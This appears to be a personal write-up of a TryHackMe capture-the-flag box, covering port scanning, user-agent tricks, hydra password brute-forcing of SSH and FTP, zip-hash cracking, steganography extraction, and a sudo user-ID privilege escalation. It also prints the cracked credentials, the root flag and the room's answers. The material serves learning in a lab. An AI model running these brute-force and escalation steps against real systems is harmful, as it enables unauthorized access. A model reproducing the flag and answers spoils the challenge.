Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-14 05:57 EDTNmap scan report for 10.10.196.182Host is up (0.24s latency).Not shown: 997 closed tcp ports (reset)PORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open httpNmap done: 1 IP address (1 host up) scanned in 25.94 seconds
nmap -p- -Pn -A -T4 10.10.196.182 > Ascan.txt:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-14 05:56 EDTNmap scan report for 10.10.196.182Host is up (0.23s latency).Not shown: 65532 closed tcp ports (reset)PORT STATE SERVICE VERSION21/tcp open ftp vsftpd 3.0.322/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:| 2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)| 256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)|_ 256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)80/tcp open http Apache httpd 2.4.29 ((Ubuntu))|_http-title: Annoucement|_http-server-header: Apache/2.4.29 (Ubuntu)Aggressive OS guesses: Linux 4.4 (97%), Android 9 - 10 (Linux 4.9 - 4.14) (96%), Linux 4.15 (96%), Linux 3.2 - 4.14 (96%), Linux 4.15 - 5.19 (96%), Linux 2.6.32 - 3.10 (96%), Linux 3.10 - 3.13 (95%), Linux 2.6.32 - 3.5 (94%), Linux 2.6.32 - 3.13 (94%), Linux 3.10 - 4.11 (94%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hopsService Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 443/tcp)HOP RTT ADDRESS1 191.20 ms 10.21.0.12 241.01 ms 10.10.196.182OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 1168.88 seconds
version enum:
OpenSSH 7.6p1 has 3 username enum scripts for all versions under 7.7 it seems
theres a DoS for vsftpd 3.0.3 but thats useless for us
http enum:
just this on the root page:
Dear agents,
Use your own codename as user-agent to access the site.
From,
Agent R
something to do with the user-agent. gonna keep it in the back pocket for now
time to do some dirbusting
dirbusting results:
nothing showed up on feroxbuster or ffuf
http enum 2:
lets see what the user-agent thing was by capturing an http result and messing with the http-headers
theres only one redirect. everything else is the same
http-response for user-agent C:
HTTP/1.1 302 FoundDate: Mon, 14 Apr 2025 10:43:58 GMTServer: Apache/2.4.29 (Ubuntu)Location: agent_C_attention.phpContent-Length: 218Keep-Alive: timeout=5, max=98Connection: Keep-AliveContent-Type: text/html; charset=UTF-8<!DocType html><html> <head> <title>Annoucement</title> </head> <body> <p> Dear agents, <br><br> Use your own <b> codename </b> as user-agent to access the site. <br><br> From,<br> Agent R </p> </body></html>
we can see the actual location in the Location header where it says: agent_C_attention.php
lets send a GET request there and see what we get
http-response:
HTTP/1.1 200 OKDate: Mon, 14 Apr 2025 10:59:57 GMTServer: Apache/2.4.29 (Ubuntu)Vary: Accept-EncodingContent-Length: 177Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8Attention chris, <br><br>Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak! <br><br>From,<br>Agent R
got a possible uname chris. his password’s apparently weak
so far the possible users are:
chris
Agent R
Agent J
ssh and ftp bruteforcing:
hydra -l chris -P /usr/share/wordlists/rockyou.txt ssh://10.10.196.182:22 while that runs imma run an ftp bruteforce as well since the room asks for it. oh and all nmap ftp scripts as well cuz why tf not
fun lmao. we already got the pass from ftp as well
found creds:
chris:crystal
ftp stuff:
lets try logging in and see what we find in there
yaay logged in. lets see whats there
-rw-r--r-- 1 0 0 217 Oct 29 2019 To_agentJ.txt
-rw-r--r-- 1 0 0 33143 Oct 29 2019 cute-alien.jpg
-rw-r--r-- 1 0 0 34842 Oct 29 2019 cutie.png
lets get em all hqhqhqhq
wget -r ftp://chris:crystal@10.10.196.182/
To_agentJ.txt:
Dear agent J,
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
From,
Agent C
hmmmmmmm seems like all these alien photos are somehow fake and theres a real photo stored at /home/agentJ or something. and theres apparently user creds stored in these images. time to use steghide babyyyyy
the two pictures:
cutie.png:
cute-alien.jpg:
(the fake transparency really pisses me off smh)
image data extraction and enum:
used exiftool to see if there was any interesting matadata but didnt get anything
ran strings against both of them. theres a To_agentR.txt in the png file. didnt manage to find anything in the jpeg output cuz im not used to analyzing strings outputs yet
explanation of the hash string: (gonna look into this more)
john z2jHash.txt --wordlist=/usr/share/wordlists/rockyou.txt:
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128/128 AVX 4x])
Cost 1 (HMAC size) is 78 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alien (8702.zip/To_agentR.txt)
1g 0:00:00:00 DONE (2025-04-14 08:46) 3.571g/s 87771p/s 87771c/s 87771C/s christal..280789
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
yaay the zip pass is alien
extracted it with 7z x -palien filename and got To_AgentR.txt:
Agent C,
We need to send the picture to 'QXJlYTUx' as soon as possible!
By,
Agent R
seems like a hash (its not. its base64)
ran echo QXJlYTUx | base64 -d and got Area51 which was the pass for steghide
StegCracker 2.1.0 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2025 - Luke Paris (Paradoxis)
StegCracker has been retired following the release of StegSeek, which
will blast through the rockyou.txt wordlist within 1.9 second as opposed
to StegCracker which takes ~5 hours.
StegSeek can be found at: https://github.com/RickdeJager/stegseek
Counting lines in wordlist..
Attacking file 'cute-alien.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: Area51doro1111
Tried 441075 passwords
Your file has been written to: cute-alien.jpg.out
Area51
new found pass: Area51
cute-alien.jpg:
Hi james,
Glad you find this message. Your login password is hackerrules!
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
chris
james can run bash as any user other than root. and the user id -1 in this case gets stored in binary with the two's complement rule, which then turns it into the maximum value of a 32 bit integer:
and when the system sees this max value it wraps around and treats it like 0. and since we’re not directly using 0 here it doesnt see we’re running it as root and runs it anyways. and due to the conversion in binary, it gets treated as 0 and we get /bin/bash as root hehe
root.txt:
To Mr.hacker,
Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
Your flag is
b53a02f55b57d4439e3341834d70c062
By,
DesKel a.k.a Agent R
THM answers:
ports open: 3
how do i redirect myself to a secret page?: user-agent
(the fake transparency really pisses me off smh)
